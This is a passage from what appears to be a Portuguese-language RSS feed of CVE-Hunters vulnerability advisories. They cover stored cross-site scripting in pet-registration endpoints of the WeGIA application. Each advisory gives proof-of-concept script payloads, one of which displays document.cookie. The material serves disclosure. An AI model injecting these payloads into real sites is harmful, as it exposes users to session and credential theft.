        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53929</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53929/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53929/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_corphp-parâmetro-cor&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_corphp-parâmetro-cor&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Gatilho XSS: &amp;lt;code&amp;gt;/html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53929/image.png&amp;#34;
	width=&amp;#34;809&amp;#34;
	height=&amp;#34;498&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53929/image_hu_53ddbaf9c4cb2957.png 480w, /p/cve-2025-53929/image_hu_37121886be6a1b9a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;162&amp;#34;
		data-flex-basis=&amp;#34;389px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53930</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53930/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53930/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53930-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_especiephp-parâmetro-especie&amp;#34;&amp;gt;CVE-2025-53930: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53930-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_especiephp-parâmetro-especie&amp;#34;&amp;gt;CVE-2025-53930: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53930/image.png&amp;#34;
	width=&amp;#34;1325&amp;#34;
	height=&amp;#34;311&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53930/image_hu_e1e18487d5585a94.png 480w, /p/cve-2025-53930/image_hu_fad609f1d6c9aa79.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;426&amp;#34;
		data-flex-basis=&amp;#34;1022px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53930/image-1.png&amp;#34;
	width=&amp;#34;1268&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53930/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53930/image-1_hu_4cccc1269b2a5680.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;515&amp;#34;
		data-flex-basis=&amp;#34;1237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53931</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53931/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53931/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53931-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_racaphp-parâmetro-raca&amp;#34;&amp;gt;CVE-2025-53931: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
